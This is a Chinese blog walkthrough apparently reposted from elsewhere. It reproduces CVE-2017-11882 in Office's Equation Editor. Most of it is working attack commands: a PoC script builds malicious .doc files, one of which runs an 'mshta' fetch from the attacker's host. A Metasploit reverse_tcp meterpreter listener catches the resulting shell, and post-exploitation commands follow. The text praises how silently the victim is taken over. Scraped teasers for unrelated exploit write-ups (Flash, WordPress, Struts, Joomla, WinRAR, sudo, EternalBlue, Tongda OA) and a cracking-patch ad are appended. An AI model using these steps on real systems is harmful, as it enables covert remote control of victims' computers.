[漏洞复现] CVE-2017-11882 通杀所有Office版本

此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。

举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。

影响版本: 
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

漏洞复现环境

Kali2017 + windows 7 + office 2016

渗透机:kali linux + POC代码

靶机:Win 7 + Office 2016

在kali新建一个文件夹CVE-2017-11882,放进我们需要的poc代码

生成word文档11882.doc,打开doc文件之后,会弹出计算器(以此验证offce漏洞)

[email protected]:~/桌面/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc

生成word文档11882-2.doc,打开doc文件之后,会弹出任务管理器(以此验证offce漏洞)

[email protected]:~/桌面/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o 11882-2.doc

再次查看,可以看到多了两个doc文件

将文件拷贝到win7靶机上,并验证结果

使用Word 2016打开第一个文件-11882.doc文件,查看效果:

成功弹出计算器。

使用Word 2016打开第二个文件-11882-2.doc文件,查看效果:

成功弹出事务管理器。

可以看到,由于Office2016存在CVE-2017-11882漏洞,当打开特殊构造的word文件时,windows会执行其他动作。

在kali linux 上构造带有shell后门的word文件,并开启监听

首先,为了后续更好的管理和使用渗透代码,可以将“shell.rb”,名称修改为“cve-2017-11886.rb”

将CVE-2017-11882.rb拷贝到metasploit目录中,这里拷贝到目录/usr/share/metasploit-framework/modules/exploits/windows/smb

[email protected]:~# cd /usr/share/metasploit-framework/modules/exploits/windows/smb
[email protected]:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/桌 面/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rb

好的,我们已经将这个CVE-2017-11882.rb复制过去了。

进入Metasploit框架,

[email protected]:~# msfconsole 

搜索CVE-2017-11882:

msf > search CVE-2017-11882

使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:

使用模块
msf > use exploit/windows/smb/CVE-2017-11882
设置tcp反弹会话
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
设置渗透机ip地址(这里通过ifconfig命令查看)
msf exploit(CVE-2017-11882) > set lhost 192.168.190.130
设置路径为11882,可自定义
msf exploit(CVE-2017-11882) > set uripath 11882
开启渗透,进入监听状态
msf exploit(CVE-2017-11882) > exploit 

使用CVE-2017-11882.py模块,生成带有shell的doc文件:

[email protected]:~/桌面/CVE-2017-11882# python CVE-2017-11882.py -c "mshta http://192.168.190.130:8080/11882" -o 11882-3.doc

此时,CVE-2017-11882目录中增加了另外一个word文件11882-3,而此文件的功能便是:打开它的电脑会反弹shell会话到控制机。

将文件11882-3.doc拷贝到靶机win7上面:

在Win7打开11882-3.doc文件,此时观察Win7靶机和Kali Linux渗透机。

注:做这个实验之前,首先要求渗透机Kali Linux和靶机Win7能够联通,例如在我的虚拟环境中,Kali Linux的ip地址是192.168.190.130,而Win7的地址是192.168.190.131,两个虚拟机采用NAT网卡模式。

当靶机打开文件时,整个过程没有任何弹框,也没有其他异常动作,整个攻击效果非常“优雅”,肉鸡很难发现。

此时,在另一段的kali linux渗透机,已经获取到shell会话。

通过命令sessions查看meterpreter会话:

msf exploit(CVE-2017-11882) > sessions

此后便可以通过meterpreter来对会话进行管理:

进入会话
msf exploit(CVE-2017-11882) > sessions 1
查看系统信息
meterpreter > sysinfo
查看当前用户
meterpreter > getuid
截屏
meterpreter > screenshot

可以看到,安装了最新office 2016版本的win7,因为CVE-2017-1182漏洞,当打开带有shell后门的doc文件是,kali渗透机可以获取到完美的后门并控制win7

实验操作根据拼客院长陈鑫杰的实验进行复现的https://zhuanlan.zhihu.com/p/35248996

原文地址:https://www.cnblogs.com/ESHLkangi/p/9146069.html

时间: 2024-11-08 07:40:28

[漏洞复现] CVE-2017-11882 通杀所有Office版本的相关文章

[漏洞复现] CVE-2018-4878 Flash 0day

1.漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878). 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被"远程代码执行",并且直接被getshell. 直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞. 互联网上出现的基于此Flash 0day漏洞进行攻击的样本,其实在2017年底就

最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法

2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目 前的wordpress 4.8.6 以及wordpress 4.9.6版本.可以删除网站上的任意文件,影响危害严重, 甚至是致命的一个漏洞,如果被攻击者利用,后果将不堪设想.截止目前该漏洞还未有被修复, 如果您在使用wordpress,请尽快将wp-includes文件夹下的post.php文件改名,等官方出 wordpress漏洞补丁后,再改回并升级. wordpress是许多站长以及建站公

可可9.5通杀补丁(吹大了!能破解80%)1.2版

可可 E盾 和飘零 并称为三大游戏外挂的集散地 几乎市面上90%的辅助都来自于这几款网络验证 当然了并不是说只有外挂程序 才用这些网络验证  一些其他的便民软件 也使用这些验证 可可网络验证 现在还是处于比较一线的网络验证系统 今天给大家带来的就是可可v9 补正版数据的通杀补丁   能破解市面上80%的可可软件     软件仅供学习交流,严禁用于商业用途,请于24小时内删除.         补丁升级到1.2版本  全面支持各种系统  破解完辅助不能用 那是辅助自身不支持 和补丁无关      

8.Structs 2-057漏洞复现

漏洞信息: 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行. url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行. 官方解决方案: 升级至版本2.3.35或2.5.17.这两个版本仅仅只是更新了安全补丁,不存在兼容性问题. 临时解决方案: 推荐用户及时更新,但如果不想更新,可暂时使用官方提供的临时解决方案:当上层动作配置

[CMS]Joomla 3.4.6-RCE漏洞复现

0x00:简介 1.Joomla是一套全球有名的CMS系统. 2.Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12. 3.Joomla可以在多种不同的平台上部署并且运行. 0x01 环境配置 RCE:https://github.com/momika233/Joomla-3.4.6-RCE 环境下载:https://downloads.joomla.org/it/cms/joomla3/3-4-6 0x02 漏洞复现 2.1 漏洞位置 http

WinRAR代码执行漏洞复现

漏洞介绍 WinRAR 是一款流行的解压缩工具,据其官网上发布的数据,全球有超过5亿的用户在使用 2019年2月20日,安全厂商 checkpoint 发布了名为<Extracting a 19 Year old code Execution from WinRAR>的文章,文章披露了一个存在于 winRAR 中用于 ace 文件解析的 DLL 模块中的绝对路径穿越漏洞,可导致远程代码执行. 漏洞类型:代码执行 漏洞利用条件:将压缩包解压到当前文件夹,同时释放恶意文件到指定目录,重启机器便会触

[漏洞复现]CVE-2019-14287 sudo提权漏洞

漏洞描述 2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警.通过特定payload,用户可提升至root权限. 利用前提 sudo -v < 1.8.28 知道当前用户的密码 当前用户存在于sudo权限列表 漏洞复现 [email protected]:~$ id uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),

EternalBlue永恒之蓝漏洞复现

EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马.由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多

通达OA 任意文件上传+文件包含导致RCE漏洞复现

0X00漏洞简介 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批.行政办公.日常事务.数据统计分析.即时通讯.移动办公等. 该漏洞被黑产利用,用于投放勒索病毒 该漏洞在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执行漏洞,从而导致可以控制服务器system权限. 0X01漏洞影响 V11版.2017版.2016版.2015版.2013增强版.2013版 0X02漏洞原理